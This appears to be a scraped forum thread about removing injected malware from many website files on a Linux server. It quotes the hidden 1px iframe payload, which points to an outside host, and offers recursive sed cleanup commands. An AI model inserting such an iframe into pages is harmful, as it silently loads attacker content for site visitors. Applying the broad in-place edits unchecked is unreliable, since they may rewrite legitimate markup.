Looking for script to delete iframe malware from l

2019-07-29 10:39发布

I'm looking for a script to delete the following iframe malware from my linux server:

    <iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe>

It has infected hundreads of files on my server on different websites. I tried

    grep -rl ishigo.sytes.net * | sed 's/ /\ /g' | xargs sed -i 's/<iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe>//g'

but it just outputs:

    sed: -e expression #1, char 49: unknown option to `s'

Appreciate your help :)

Cheers Dee

标签： iframe malware

2条回答

倾城　Initia

2楼-- · 2019-07-29 11:15

Unescape the backslashes from the url in the sed regex.

0人赞添加讨论(0) 举报

Melony?

3楼-- · 2019-07-29 11:24

This should be a more generic solution. Effectively what the malware does is look for the </body> and inject the iframe it just before that. So you can look for an iframe which is just before the </body> and replace it with just the </body>

# grep recursively for text
# escape all spaces in file names
# global search and replace with just body tag
grep -Rl "</iframe></body>" * | sed 's/ /\ /g' | xargs sed -i 's/<iframe .*><\/iframe><\/body>/<\/body>/g'

I found this other question on renaming the malware files is also useful to quickly take down all the compromised files by renaming the extensions with a .hacked at the end. Then you can fix the hack and finally remove the .hacked

0人赞添加讨论(0) 举报

Looking for script to delete iframe malware from l

采纳回答

编辑标签

举报内容

检举类型

检举原因

检举说明(必填)

打开微信“扫一扫”，打开网页后点击屏幕右上角分享按钮

付费偷看金额在0.1-10元之间